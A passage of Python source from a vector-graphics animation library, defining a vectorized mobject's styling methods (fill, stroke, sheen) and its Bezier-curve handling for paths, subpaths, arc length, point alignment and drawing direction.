curr_rgbas[:, :3] = rgbas[:, :3]
if opacity is not None:
curr_rgbas[:, 3] = rgbas[:, 3]
return self
def set_fill(self, color=None, opacity=None, family=True):
if family:
for submobject in self.submobjects:
submobject.set_fill(color, opacity, family)
self.update_rgbas_array("fill_rgbas", color, opacity)
if opacity is not None:
self.fill_opacity = opacity
return self
def set_stroke(
self, color=None, width=None, opacity=None, background=False, family=True
):
if family:
for submobject in self.submobjects:
submobject.set_stroke(color, width, opacity, background, family)
if background:
array_name = "background_stroke_rgbas"
width_name = "background_stroke_width"
opacity_name = "background_stroke_opacity"
color_name = "background_stroke_color"
else:
array_name = "stroke_rgbas"
width_name = "stroke_width"
opacity_name = "stroke_opacity"
color_name = "stroke_color"
self.update_rgbas_array(array_name, color, opacity)
if width is not None:
setattr(self, width_name, width)
if opacity is not None:
setattr(self, opacity_name, opacity)
if color is not None:
setattr(self, color_name, color)
return self
def set_background_stroke(self, **kwargs):
kwargs["background"] = True
self.set_stroke(**kwargs)
return self
def set_style(
self,
fill_color=None,
fill_opacity=None,
stroke_color=None,
stroke_width=None,
stroke_opacity=None,
background_stroke_color=None,
background_stroke_width=None,
background_stroke_opacity=None,
sheen_factor=None,
sheen_direction=None,
background_image=None,
family=True,
):
self.set_fill(color=fill_color, opacity=fill_opacity, family=family)
self.set_stroke(
color=stroke_color,
width=stroke_width,
opacity=stroke_opacity,
family=family,
)
self.set_background_stroke(
color=background_stroke_color,
width=background_stroke_width,
opacity=background_stroke_opacity,
family=family,
)
if sheen_factor:
self.set_sheen(
factor=sheen_factor, direction=sheen_direction, family=family
)
if background_image:
self.color_using_background_image(background_image)
return self
def get_style(self, simple=False):
ret = {
"stroke_opacity": self.get_stroke_opacity(),
"stroke_width": self.get_stroke_width(),
}
if simple:
ret["fill_color"] = colour.rgb2hex(self.get_fill_color().get_rgb())
ret["fill_opacity"] = self.get_fill_opacity()
ret["stroke_color"] = colour.rgb2hex(self.get_stroke_color().get_rgb())
else:
ret["fill_color"] = self.get_fill_colors()
ret["fill_opacity"] = self.get_fill_opacities()
ret["stroke_color"] = self.get_stroke_colors()
ret["background_stroke_color"] = self.get_stroke_colors(background=True)
ret["background_stroke_width"] = self.get_stroke_width(background=True)
ret["background_stroke_opacity"] = self.get_stroke_opacity(background=True)
ret["sheen_factor"] = self.get_sheen_factor()
ret["sheen_direction"] = self.get_sheen_direction()
ret["background_image"] = self.get_background_image()
return ret
def match_style(self, vmobject, family=True):
self.set_style(**vmobject.get_style(), family=False)
if family:
# Does its best to match up submobject lists, and
# match styles accordingly
submobs1, submobs2 = self.submobjects, vmobject.submobjects
if len(submobs1) == 0:
return self
elif len(submobs2) == 0:
submobs2 = [vmobject]
for sm1, sm2 in zip(*make_even(submobs1, submobs2)):
sm1.match_style(sm2)
return self
def set_color(self, color, family=True):
self.set_fill(color, family=family)
self.set_stroke(color, family=family)
# check if a list of colors is passed to color
if isinstance(color, str):
self.color = colour.Color(color)
else:
self.color = color
return self
def set_opacity(self, opacity, family=True):
self.set_fill(opacity=opacity, family=family)
self.set_stroke(opacity=opacity, family=family)
self.set_stroke(opacity=opacity, family=family, background=True)
return self
def fade(self, darkness=0.5, family=True):
factor = 1.0 - darkness
self.set_fill(opacity=factor * self.get_fill_opacity(), family=False)
self.set_stroke(opacity=factor * self.get_stroke_opacity(), family=False)
self.set_background_stroke(
opacity=factor * self.get_stroke_opacity(background=True), family=False
)
super().fade(darkness, family)
return self
def get_fill_rgbas(self):
try:
return self.fill_rgbas
except AttributeError:
return np.zeros((1, 4))
def get_fill_color(self):
"""
If there are multiple colors (for gradient)
this returns the first one
"""
return self.get_fill_colors()[0]
def get_fill_opacity(self):
"""
If there are multiple opacities, this returns the
first
"""
return self.get_fill_opacities()[0]
def get_fill_colors(self):
return [colour.Color(rgb=rgba[:3]) for rgba in self.get_fill_rgbas()]
def get_fill_opacities(self):
return self.get_fill_rgbas()[:, 3]
def get_stroke_rgbas(self, background=False):
try:
if background:
rgbas = self.background_stroke_rgbas
else:
rgbas = self.stroke_rgbas
return rgbas
except AttributeError:
return np.zeros((1, 4))
def get_stroke_color(self, background=False):
return self.get_stroke_colors(background)[0]
def get_stroke_width(self, background=False):
if background:
width = self.background_stroke_width
else:
width = self.stroke_width
if isinstance(width, str):
width = int(width)
return max(0, width)
def get_stroke_opacity(self, background=False):
return self.get_stroke_opacities(background)[0]
def get_stroke_colors(self, background=False):
return [
colour.Color(rgb=rgba[:3]) for rgba in self.get_stroke_rgbas(background)
]
def get_stroke_opacities(self, background=False):
return self.get_stroke_rgbas(background)[:, 3]
def get_color(self):
if np.all(self.get_fill_opacities() == 0):
return self.get_stroke_color()
return self.get_fill_color()
def set_sheen_direction(self, direction, family=True):
direction = np.array(direction)
if family:
for submob in self.get_family():
submob.sheen_direction = direction
else:
self.sheen_direction = direction
return self
def set_sheen(self, factor, direction=None, family=True):
if family:
for submob in self.submobjects:
submob.set_sheen(factor, direction, family)
self.sheen_factor = factor
if direction is not None:
# family set to false because recursion will
# already be handled above
self.set_sheen_direction(direction, family=False)
# Reset color to put sheen_factor into effect
if factor != 0:
self.set_stroke(self.get_stroke_color(), family=family)
self.set_fill(self.get_fill_color(), family=family)
return self
def get_sheen_direction(self):
return np.array(self.sheen_direction)
def get_sheen_factor(self):
return self.sheen_factor
def get_gradient_start_and_end_points(self):
if self.shade_in_3d:
return get_3d_vmob_gradient_start_and_end_points(self)
else:
direction = self.get_sheen_direction()
c = self.get_center()
bases = np.array(
[self.get_edge_center(vect) - c for vect in [RIGHT, UP, OUT]]
).transpose()
offset = np.dot(bases, direction)
return (c - offset, c + offset)
def color_using_background_image(self, background_image: Union[Image, str]):
self.background_image = background_image
self.set_color(WHITE)
for submob in self.submobjects:
submob.color_using_background_image(background_image)
return self
def get_background_image(self) -> Union[Image, str]:
return self.background_image
def match_background_image(self, vmobject):
self.color_using_background_image(vmobject.get_background_image())
return self
def set_shade_in_3d(self, value=True, z_index_as_group=False):
for submob in self.get_family():
submob.shade_in_3d = value
if z_index_as_group:
submob.z_index_group = self
return self
# Points
def set_points(self, points):
self.points = np.array(points)
return self
def get_points(self):
return np.array(self.points)
def set_anchors_and_handles(
self,
anchors1: Sequence[float],
handles1: Sequence[float],
handles2: Sequence[float],
anchors2: Sequence[float],
) -> "VMobject":
"""Given two sets of anchors and handles, process them to set them as anchors and handles of the VMobject.
anchors1[i], handles1[i], handles2[i] and anchors2[i] define the i-th bezier curve of the vmobject. There are four hardcoded paramaters and this is a problem as it makes the number of points per cubic curve unchangeable from 4. (two anchors and two handles).
Returns
-------
VMobject
for chaining.
"""
assert len(anchors1) == len(handles1) == len(handles2) == len(anchors2)
nppcc = self.n_points_per_cubic_curve # 4
total_len = nppcc * len(anchors1)
self.points = np.zeros((total_len, self.dim))
# the following will, from the four sets, dispatch them into points such that self.points = [anchors1[0], handles1[0], handles2[0], anchors2[0], anchors1[1], handles1[1], ...]
arrays = [anchors1, handles1, handles2, anchors2]
for index, array in enumerate(arrays):
self.points[index::nppcc] = array
return self
def clear_points(self):
self.points = np.zeros((0, self.dim))
def append_points(self, new_points):
# TODO, check that number new points is a multiple of 4?
# or else that if len(self.points) % 4 == 1, then
# len(new_points) % 4 == 3?
self.points = np.append(self.points, new_points, axis=0)
return self
def start_new_path(self, point):
# TODO, make sure that len(self.points) % 4 == 0?
self.append_points([point])
return self
def add_cubic_bezier_curve(
self, anchor1: np.ndarray, handle1: np.ndarray, handle2: np.ndarray, anchor2
) -> None:
# TODO, check the len(self.points) % 4 == 0?
self.append_points([anchor1, handle1, handle2, anchor2])
def add_cubic_bezier_curve_to(
self, handle1: np.ndarray, handle2: np.ndarray, anchor: np.ndarray
) -> None:
"""Add cubic bezier curve to the path.
NOTE: the first anchor is not a parameter; by default it is the end of the last sub-path.
Parameters
----------
handle1 : np.ndarray
first handle
handle2 : np.ndarray
second handle
anchor : np.ndarray
anchor
"""
self.throw_error_if_no_points()
new_points = [handle1, handle2, anchor]
if self.has_new_path_started():
self.append_points(new_points)
else:
self.append_points([self.get_last_point()] + new_points)
def add_quadratic_bezier_curve_to(
self, handle: np.ndarray, anchor: np.ndarray
) -> "VMobject":
"""Add Quadratic bezier curve to the path."""
# How does one approximate a quadratic with a cubic?
# refer to the Wikipedia page on Bezier curves
# https://en.wikipedia.org/wiki/B%C3%A9zier_curve#Degree_elevation, accessed Jan 20, 2021
# 1. Copy the end points, and then
# 2. Place the 2 middle control points 2/3 along the line segments
# from the end points to the quadratic curve's middle control point.
# I think that's beautiful.
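# A quick worked check of the 2/3 rule above, using hypothetical 1-D values
# that are not taken from the library: for a quadratic with start P0 = 0,
# control point Q = 3 and end P2 = 6, the elevated cubic handles are
#   C1 = 2/3 * Q + 1/3 * P0 = 2
#   C2 = 2/3 * Q + 1/3 * P2 = 4
# which is exactly what the call below computes, with handle = Q, anchor = P2
# and self.get_last_point() = P0.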
self.add_cubic_bezier_curve_to(
2 / 3 * handle + 1 / 3 * self.get_last_point(),
2 / 3 * handle + 1 / 3 * anchor,
anchor,
)
return self
def add_line_to(self, point: np.ndarray) -> "VMobject":
"""Add a straight line from the last point of VMobject to the given point.
Parameters
----------
point : np.ndarray
end of the straight line.
"""
nppcc = self.n_points_per_cubic_curve
self.add_cubic_bezier_curve_to(
*[
interpolate(self.get_last_point(), point, a)
for a in np.linspace(0, 1, nppcc)[1:]
]
)
return self
def add_smooth_curve_to(self, *points: np.array) -> "VMobject":
"""Creates a smooth curve from given points and add it to the VMobject. If two points are passed in, the first is interpreted
as a handle, the second as an anchor.
Parameters
----------
points: np.array
Points (anchor and handle, or just anchor) to add a smooth curve from
Returns
-------
VMobject
Raises
------
ValueError
If 0 or more than 2 points are given.
"""
# TODO remove the value error and just add two parameters with one optional
if len(points) == 1:
handle2 = None
new_anchor = points[0]
elif len(points) == 2:
handle2, new_anchor = points
else:
name = sys._getframe(0).f_code.co_name
raise ValueError(f"Only call {name} with 1 or 2 points")
if self.has_new_path_started():
self.add_line_to(new_anchor)
else:
self.throw_error_if_no_points()
last_h2, last_a2 = self.points[-2:]
last_tangent = last_a2 - last_h2
handle1 = last_a2 + last_tangent
if handle2 is None:
to_anchor_vect = new_anchor - last_a2
new_tangent = rotate_vector(last_tangent, PI, axis=to_anchor_vect)
handle2 = new_anchor - new_tangent
self.append_points([last_a2, handle1, handle2, new_anchor])
return self
def has_new_path_started(self):
nppcc = self.n_points_per_cubic_curve # 4
# A new path has started when there is a dangling control point that is not yet part of a complete bezier subcurve.
return len(self.points) % nppcc == 1
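# Illustrative count (assumed scenario, not library output): right after
# start_new_path(p) on an empty mobject len(self.points) == 1, and 1 % 4 == 1,
# so a new path has started; once a full cubic curve is appended the count
# becomes 4 and 4 % 4 == 0, so no dangling start point remains.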
def get_last_point(self):
return self.points[-1]
def is_closed(self):
# TODO use consider_points_equals_2d ?
return self.consider_points_equals(self.points[0], self.points[-1])
def add_points_as_corners(self, points: np.ndarray) -> "VMobject":
for point in points:
self.add_line_to(point)
return points
def set_points_as_corners(self, points: Sequence[float]) -> "VMobject":
"""Given an array of points, set them as corner of the vmobject.
To achieve that, this algorithm sets handles aligned with the anchors such that the resultant bezier curve will be the segment
between the two anchors.
Parameters
----------
points : Iterable[float]
Array of points that will be set as corners.
Returns
-------
VMobject
self. For chaining purposes.
"""
nppcc = self.n_points_per_cubic_curve
points = np.array(points)
# This will set the handles aligned with the anchors.
# That is, each bezier curve becomes the straight segment between its two anchors, with the handles lying on that segment.
self.set_anchors_and_handles(
*[interpolate(points[:-1], points[1:], a) for a in np.linspace(0, 1, nppcc)]
)
return self
def set_points_smoothly(self, points):
self.set_points_as_corners(points)
self.make_smooth()
return self
def change_anchor_mode(self, mode: str) -> "VMobject":
"""Changes the anchor mode of the bezier curves. This will modify the handles.
There can be only two modes, "jagged", and "smooth".
Returns
-------
VMobject
For chaining purposes.
"""
assert mode in ["jagged", "smooth"]
nppcc = self.n_points_per_cubic_curve
for submob in self.family_members_with_points():
subpaths = submob.get_subpaths()
submob.clear_points()
# A subpath can be composed of several bezier curves.
for subpath in subpaths:
# This will retrieve the anchors of the subpath by selecting every nth element of the array subpath.
# The append is needed because the last element is not reached when slicing with numpy.
anchors = np.append(subpath[::nppcc], subpath[-1:], 0)
if mode == "smooth":
h1, h2 = get_smooth_handle_points(anchors)
elif mode == "jagged":
# The following will make the handles aligned with the anchors, thus making the bezier curve a segment
a1 = anchors[:-1]
a2 = anchors[1:]
h1 = interpolate(a1, a2, 1.0 / 3)
h2 = interpolate(a1, a2, 2.0 / 3)
new_subpath = np.array(subpath)
new_subpath[1::nppcc] = h1
new_subpath[2::nppcc] = h2
submob.append_points(new_subpath)
return self
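# Illustrative check of the "jagged" branch above with hypothetical 1-D
# anchors a1 = 0 and a2 = 3: the handles land at 1 and 2, i.e. on the straight
# segment between the anchors, so each curve degenerates to a line segment.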
def make_smooth(self):
return self.change_anchor_mode("smooth")
def make_jagged(self):
return self.change_anchor_mode("jagged")
def add_subpath(self, points: np.ndarray) -> "VMobject":
assert len(points) % 4 == 0
self.points = np.append(self.points, points, axis=0)
return self
def append_vectorized_mobject(self, vectorized_mobject):
new_points = list(vectorized_mobject.points)
if self.has_new_path_started():
# Remove last point, which is starting
# a new path
self.points = self.points[:-1]
self.append_points(new_points)
def apply_function(self, function):
factor = self.pre_function_handle_to_anchor_scale_factor
self.scale_handle_to_anchor_distances(factor)
Mobject.apply_function(self, function)
self.scale_handle_to_anchor_distances(1.0 / factor)
if self.make_smooth_after_applying_functions:
self.make_smooth()
return self
def scale_handle_to_anchor_distances(self, factor: float) -> "VMobject":
"""If the distance between a given handle point H and its associated
anchor point A is d, then it changes H to be a distance factor*d
away from A, but so that the line from A to H doesn't change.
This is mostly useful in the context of applying a (differentiable)
function, to preserve tangency properties. One would pull all the
handles closer to their anchors, apply the function then push them out
again.
Parameters
----------
factor
The factor used for scaling.
Returns
-------
VMobject
For chaining.
"""
for submob in self.family_members_with_points():
if len(submob.points) < self.n_points_per_cubic_curve:
# The case where a bezier quad is not complete (there is no bezier curve because there are not enough control points).
continue
a1, h1, h2, a2 = submob.get_anchors_and_handles()
a1_to_h1 = h1 - a1
a2_to_h2 = h2 - a2
new_h1 = a1 + factor * a1_to_h1
new_h2 = a2 + factor * a2_to_h2
submob.set_anchors_and_handles(a1, new_h1, new_h2, a2)
return self
#
def consider_points_equals(self, p0, p1):
return np.allclose(p0, p1, atol=self.tolerance_for_point_equality)
def consider_points_equals_2d(self, p0: np.ndarray, p1: np.ndarray) -> bool:
"""Determine if two points are close enough to be considered equal.
This uses the algorithm from np.isclose(), but expanded here for the
2D point case. NumPy is overkill for such a small question.
Parameters
----------
p0 : np.ndarray
first point
p1 : np.ndarray
second point
Returns
-------
bool
whether the two points are considered close.
"""
rtol = 1.0e-5 # default from np.isclose()
atol = self.tolerance_for_point_equality
if abs(p0[0] - p1[0]) > atol + rtol * abs(p1[0]):
return False
if abs(p0[1] - p1[1]) > atol + rtol * abs(p1[1]):
return False
return True
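# A worked illustration of the check above with hypothetical numbers: with
# atol = 1e-6 and rtol = 1e-5, the points (1.0, 2.0) and (1.0000005, 2.0) are
# considered equal, because |1.0 - 1.0000005| = 5e-7 <= 1e-6 + 1e-5 * 1.0000005
# for the x coordinates, and the y coordinates are identical.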
# Information about line
def get_cubic_bezier_tuples_from_points(self, points):
return np.array(list(self.gen_cubic_bezier_tuples_from_points(points)))
def gen_cubic_bezier_tuples_from_points(self, points: np.ndarray) -> typing.Tuple:
"""Returns the bezier tuples from an array of points.
self.points is a list of the anchors and handles of the bezier curves of the mobject (i.e. [anchor1, handle1, handle2, anchor2, anchor3, ...]).
This algorithm basically retrieves them by taking the elements in groups of n, where n is the number of control points
of a bezier curve.
Parameters
----------
points : np.ndarray
Points from which control points will be extracted.
Returns
-------
typing.Tuple
Bezier control points.
"""
nppcc = self.n_points_per_cubic_curve
remainder = len(points) % nppcc
points = points[: len(points) - remainder]
# Basically take every nppcc element.
return (points[i : i + nppcc] for i in range(0, len(points), nppcc))
def get_cubic_bezier_tuples(self):
return self.get_cubic_bezier_tuples_from_points(self.get_points())
def _gen_subpaths_from_points(
self, points: np.ndarray, filter_func: typing.Callable[[int], bool]
) -> typing.Tuple:
"""Given an array of points defining the bezier curves of the vmobject, return subpaths formed by these points.
Here, two bezier curves form a subpath if the relation defined by filter_func evaluates to True for their adjacent anchors.
The algorithm iterates over every bezier tuple (anchors and handles) in ``self.points`` (by regrouping every n elements, where
n is the number of points per cubic curve), and evaluates the relation between two anchors with filter_func.
NOTE: filter_func takes an int n as parameter and evaluates the relation between points[n] and points[n - 1]. This should probably be changed so that
the function takes two points as parameters.
Parameters
----------
points : np.ndarray
points defining the bezier curve.
filter_func : typing.Callable[int, bool]
Filter-func defining the relation.
Returns
-------
typing.Tuple
subpaths formed by the points.
"""
nppcc = self.n_points_per_cubic_curve
filtered = filter(filter_func, range(nppcc, len(points), nppcc))
split_indices = [0] + list(filtered) + [len(points)]
return (
points[i1:i2]
for i1, i2 in zip(split_indices, split_indices[1:])
if (i2 - i1) >= nppcc
)
def get_subpaths_from_points(self, points):
return list(
self._gen_subpaths_from_points(
points,
lambda n: not self.consider_points_equals(points[n - 1], points[n]),
)
)
def gen_subpaths_from_points_2d(self, points):
return self._gen_subpaths_from_points(
points,
lambda n: not self.consider_points_equals_2d(points[n - 1], points[n]),
)
def get_subpaths(self) -> typing.Tuple:
"""Returns subpaths formed by the curves of the VMobject.
Two curves belong to the same subpath if their extremities coincide.
Returns
-------
typing.Tuple
subpaths.
"""
return self.get_subpaths_from_points(self.get_points())
def get_nth_curve_points(self, n: int) -> np.ndarray:
"""Returns the points defining the nth curve of the vmobject.
Parameters
----------
n : int
index of the desired bezier curve.
Returns
-------
np.ndarray
points defining the nth bezier curve (anchors, handles).
"""
assert n < self.get_num_curves()
nppcc = self.n_points_per_cubic_curve
return self.points[nppcc * n : nppcc * (n + 1)]
def get_nth_curve_function(self, n: int) -> typing.Callable[[float], np.ndarray]:
"""Returns the expression of the nth curve.
Parameters
----------
n : int
index of the desired curve.
Returns
-------
typing.Callable[[float], np.ndarray]
expression of the nth bezier curve.
"""
return bezier(self.get_nth_curve_points(n))
def get_nth_curve_function_with_length(
self, n: int, sample_points: Optional[int] = None
) -> typing.Tuple[typing.Callable[[float], np.ndarray], float]:
"""Returns the expression of the nth curve along with its (approximate) length.
Parameters
----------
n
The index of the desired curve.
sample_points
The number of points to sample to find the length.
Returns
-------
curve : typing.Callable[[float], np.ndarray]
The function for the nth curve.
length : :class:`float`
The length of the nth curve.
"""
if sample_points is None:
sample_points = 10
curve = self.get_nth_curve_function(n)
points = np.array([curve(a) for a in np.linspace(0, 1, sample_points)])
diffs = points[1:] - points[:-1]
norms = np.apply_along_axis(np.linalg.norm, 1, diffs)
length = np.sum(norms)
return curve, length
def get_num_curves(self) -> int:
"""Returns the number of curves of the vmobject.
Returns
-------
int
number of curves of the vmobject.
"""
nppcc = self.n_points_per_cubic_curve
return len(self.points) // nppcc
def get_curve_functions(
self,
) -> typing.Iterable[typing.Callable[[float], np.ndarray]]:
"""Gets the functions for the curves of the mobject.
Returns
-------
typing.Iterable[typing.Callable[[float], np.ndarray]]
The functions for the curves.
"""
num_curves = self.get_num_curves()
for n in range(num_curves):
yield self.get_nth_curve_function(n)
def get_curve_functions_with_lengths(
self, **kwargs
) -> typing.Iterable[typing.Tuple[typing.Callable[[float], np.ndarray], float]]:
"""Gets the functions and lengths of the curves for the mobject.
Parameters
----------
**kwargs
The keyword arguments passed to :meth:`get_nth_curve_function_with_length`
Returns
-------
typing.Iterable[typing.Tuple[typing.Callable[[float], np.ndarray], float]]
The functions and lengths of the curves.
"""
num_curves = self.get_num_curves()
for n in range(num_curves):
yield self.get_nth_curve_function_with_length(n, **kwargs)
def point_from_proportion(self, alpha: float) -> np.ndarray:
"""Gets the point at a proportion along the path of the :class:`VMobject`.
Parameters
----------
alpha
The proportion along the path of the :class:`VMobject`.
Returns
-------
:class:`numpy.ndarray`
The point on the :class:`VMobject`.
Raises
------
:exc:`ValueError`
If ``alpha`` is not between 0 and 1.
:exc:`Exception`
If the :class:`VMobject` has no points.
"""
if alpha < 0 or alpha > 1:
raise ValueError(f"Alpha {alpha} not between 0 and 1.")
self.throw_error_if_no_points()
if alpha == 1:
return self.get_points()[-1]
curves_and_lengths = tuple(self.get_curve_functions_with_lengths())
target_length = alpha * np.sum(length for _, length in curves_and_lengths)
current_length = 0
for curve, length in curves_and_lengths:
if current_length + length >= target_length:
if length != 0:
residue = (target_length - current_length) / length
else:
residue = 0
return curve(residue)
current_length += length
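# A worked example of the walk above, with hypothetical curve lengths that
# are not taken from the library: for a path made of two curves of lengths 1
# and 3 and alpha = 0.5, target_length = 0.5 * 4 = 2. The first curve only
# accumulates 1, so the point falls on the second curve with residue
# (2 - 1) / 3 = 1/3, i.e. one third of the way along that curve.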
def get_anchors_and_handles(self) -> typing.Iterable[np.ndarray]:
"""Returns anchors1, handles1, handles2, anchors2,
where (anchors1[i], handles1[i], handles2[i], anchors2[i])
will be four points defining a cubic bezier curve
for any i in range(0, len(anchors1))
Returns
-------
typing.Iterable[np.ndarray]
Iterable of the anchors and handles.
"""
nppcc = self.n_points_per_cubic_curve
return [self.points[i::nppcc] for i in range(nppcc)]
def get_start_anchors(self) -> np.ndarray:
"""Returns the start anchors of the bezier curves.
Returns
-------
np.ndarray
Starting anchors
"""
return self.points[0 :: self.n_points_per_cubic_curve]
def get_end_anchors(self) -> np.ndarray:
"""Return the starting anchors of the bezier curves.
Returns
-------
np.ndarray
Starting anchors
"""
nppcc = self.n_points_per_cubic_curve
return self.points[nppcc - 1 :: nppcc]
def get_anchors(self) -> np.ndarray:
"""Returns the anchors of the curves forming the VMobject.
Returns
-------
np.ndarray
The anchors.
"""
if self.points.shape[0] == 1:
return self.points
return np.array(
list(it.chain(*zip(self.get_start_anchors(), self.get_end_anchors())))
)
def get_points_defining_boundary(self):
# Probably returns all anchors, but this is weird regarding the name of the method.
return np.array(list(it.chain(*[sm.get_anchors() for sm in self.get_family()])))
def get_arc_length(self, sample_points_per_curve: Optional[int] = None) -> float:
"""Return the approximated length of the whole curve.
Parameters
----------
sample_points_per_curve
Number of sample points per curve used to approximate the length. More points result in a better approximation.
Returns
-------
float
The length of the :class:`VMobject`.
"""
return np.sum(
length
for _, length in self.get_curve_functions_with_lengths(
sample_points=sample_points_per_curve
)
)
# Alignment
def align_points(self, vmobject):
# This probably makes the current vmobject and the given one have the same number of points,
# by adding extra points to the last sub-path. This method is never used in the whole library.
self.align_rgbas(vmobject)
if self.get_num_points() == vmobject.get_num_points():
return
for mob in self, vmobject:
# If there are no points, add one to
# wherever the "center" is
if mob.has_no_points():
mob.start_new_path(mob.get_center())
# If there's only one point, turn it into
# a null curve
if mob.has_new_path_started():
mob.add_line_to(mob.get_last_point())
# Figure out what the subpaths are, and align
subpaths1 = self.get_subpaths()
subpaths2 = vmobject.get_subpaths()
n_subpaths = max(len(subpaths1), len(subpaths2))
# Start building new ones
new_path1 = np.zeros((0, self.dim))
new_path2 = np.zeros((0, self.dim))
nppcc = self.n_points_per_cubic_curve
def get_nth_subpath(path_list, n):
if n >= len(path_list):
# Create a null path at the very end
return [path_list[-1][-1]] * nppcc
return path_list[n]
for n in range(n_subpaths):
sp1 = get_nth_subpath(subpaths1, n)
sp2 = get_nth_subpath(subpaths2, n)
diff1 = max(0, (len(sp2) - len(sp1)) // nppcc)
diff2 = max(0, (len(sp1) - len(sp2)) // nppcc)
sp1 = self.insert_n_curves_to_point_list(diff1, sp1)
sp2 = self.insert_n_curves_to_point_list(diff2, sp2)
new_path1 = np.append(new_path1, sp1, axis=0)
new_path2 = np.append(new_path2, sp2, axis=0)
self.set_points(new_path1)
vmobject.set_points(new_path2)
return self
def insert_n_curves(self, n: int) -> "VMobject":
"""Inserts n curves to the bezier curves of the vmobject.
Parameters
----------
n
Number of curves to insert.
Returns
-------
VMobject
for chaining.
"""
new_path_point = None
if self.has_new_path_started():
new_path_point = self.get_last_point()
new_points = self.insert_n_curves_to_point_list(n, self.get_points())
self.set_points(new_points)
if new_path_point is not None:
self.append_points([new_path_point])
return self
def insert_n_curves_to_point_list(self, n: int, points: np.ndarray) -> np.ndarray:
"""Given an array of k points defining a bezier curves (anchors and handles), returns points defining exactly k + n bezier curves.
Parameters
----------
n : int
Number of desired curves.
points : np.ndarray
Starting points.
Returns
-------
np.ndarray
Points generated.
"""
if len(points) == 1:
nppcc = self.n_points_per_cubic_curve
return np.repeat(points, nppcc * n, 0)
bezier_quads = self.get_cubic_bezier_tuples_from_points(points)
curr_num = len(bezier_quads)
target_num = curr_num + n
# This is an array with values ranging from 0
# up to curr_num, with repeats such that
# its total length is target_num. For example,
# with curr_num = 10, target_num = 15, this would
# be [0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8, 9]
repeat_indices = (np.arange(target_num) * curr_num) // target_num
# If the nth term of this list is k, it means
# that the nth curve of our path should be split
# into k pieces. In the above example, this would
# be [2, 1, 2, 1, 2, 1, 2, 1, 2, 1]
split_factors = [sum(repeat_indices == i) for i in range(curr_num)]
new_points = np.zeros((0, self.dim))
for quad, sf in zip(bezier_quads, split_factors):
# What was once a single cubic curve defined
# by "quad" will now be broken into sf
# smaller cubic curves
alphas = np.linspace(0, 1, sf + 1)
for a1, a2 in zip(alphas, alphas[1:]):
new_points = np.append(
new_points, partial_bezier_points(quad, a1, a2), axis=0
)
return new_points
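# A sanity check of the index arithmetic above, spelled out with the same
# hypothetical numbers used in the comments (curr_num = 10, target_num = 15):
#   repeat_indices = (np.arange(15) * 10) // 15
#                  = [0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8, 9]
#   split_factors  = [2, 1, 2, 1, 2, 1, 2, 1, 2, 1]
# The split factors sum to target_num, so the 10 original curves are split
# into exactly 15 smaller ones.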
def align_rgbas(self, vmobject):
attrs = ["fill_rgbas", "stroke_rgbas", "background_stroke_rgbas"]
for attr in attrs:
a1 = getattr(self, attr)
a2 = getattr(vmobject, attr)
if len(a1) > len(a2):
new_a2 = stretch_array_to_length(a2, len(a1))
setattr(vmobject, attr, new_a2)
elif len(a2) > len(a1):
new_a1 = stretch_array_to_length(a1, len(a2))
setattr(self, attr, new_a1)
return self
def get_point_mobject(self, center=None):
if center is None:
center = self.get_center()
point = VectorizedPoint(center)
point.match_style(self)
return point
def interpolate_color(self, mobject1, mobject2, alpha):
attrs = [
"fill_rgbas",
"stroke_rgbas",
"background_stroke_rgbas",
"stroke_width",
"background_stroke_width",
"sheen_direction",
"sheen_factor",
]
for attr in attrs:
setattr(
self,
attr,
interpolate(getattr(mobject1, attr), getattr(mobject2, attr), alpha),
)
if alpha == 1.0:
setattr(self, attr, getattr(mobject2, attr))
def pointwise_become_partial(
self, vmobject: "VMobject", a: float, b: float
) -> "VMobject":
"""Given two bounds a and b, transforms the points of the self vmobject into the points of the vmobject
passed as parameter with respect to the bounds. Points here stand for control points of the bezier curves (anchors and handles)
Parameters
----------
vmobject : VMobject
The vmobject that will serve as a model.
a : float
lower bound of the interval.
b : float
upper bound of the interval.
"""
assert isinstance(vmobject, VMobject)
# Partial curve includes three portions:
# - A middle section, which matches the curve exactly
# - A start, which is some ending portion of an inner cubic
# - An end, which is the starting portion of a later inner cubic
if a <= 0 and b >= 1:
self.set_points(vmobject.points)
return self
bezier_quads = vmobject.get_cubic_bezier_tuples()
num_cubics = len(bezier_quads)
# The following two lines will compute which bezier curves of the given mobject need to be processed.
# The residue basically indicates the proportion of the selected bezier curve that has to be included.
# E.g. if lower_index is 3 and lower_residue is 0.4, then the algorithm will append to the points 0.4 of the third bezier curve.
lower_index, lower_residue = integer_interpolate(0, num_cubics, a)
upper_index, upper_residue = integer_interpolate(0, num_cubics, b)
self.clear_points()
if num_cubics == 0:
return self
if lower_index == upper_index:
self.append_points(
partial_bezier_points(
bezier_quads[lower_index], lower_residue, upper_residue
)
)
else:
self.append_points(
partial_bezier_points(bezier_quads[lower_index], lower_residue, 1)
)
for quad in bezier_quads[lower_index + 1 : upper_index]:
self.append_points(quad)
self.append_points(
partial_bezier_points(bezier_quads[upper_index], 0, upper_residue)
)
return self
def get_subcurve(self, a: float, b: float) -> "VMobject":
"""Returns the subcurve of the VMobject between the interval [a, b].
The curve is a VMobject itself.
Parameters
----------
a
The lower bound.
b
The upper bound.
Returns
-------
VMobject
The subcurve on the interval [a, b].
"""
vmob = self.copy()
vmob.pointwise_become_partial(self, a, b)
return vmob
def get_direction(self):
"""Uses :func:`~.space_ops.shoelace_direction` to calculate the direction.
The direction of points determines in which direction the
object is drawn, clockwise or counterclockwise.
Examples
--------
The default direction of a :class:`~.Circle` is counterclockwise::
>>> from manim import Circle
>>> Circle().get_direction()
'CCW'
Returns
-------
:class:`str`
Either ``"CW"`` or ``"CCW"``.
"""
return shoelace_direction(self.get_start_anchors())
def reverse_direction(self):
"""Reverts the point direction by inverting the point order.
Returns
-------
:class:`VMobject`
Returns self.
Examples
--------
.. manim:: ChangeOfDirection
class ChangeOfDirection(Scene):
def construct(self):
ccw = RegularPolygon(5)
ccw.shift(LEFT)
cw = RegularPolygon(5)
cw.shift(RIGHT).reverse_direction()
self.play(Create(ccw), Create(cw),
run_time=4)
"""
self.points = self.points[::-1]
return self
def force_direction(self, target_direction):
"""Makes sure that points are either directed clockwise or
counterclockwise.
Parameters
----------
target_direction : :class:`str`
Either ``"CW"`` or ``"CCW"``.
"""
if target_direction not in ("CW", "CCW"):
raise ValueError('Invalid input for force_direction. Use "CW" or "CCW"')
if self.get_direction() != target_direction:
# Since we already assured the input is CW or CCW,
# and the directions don't match, we just reverse
self.reverse_direction()
return self
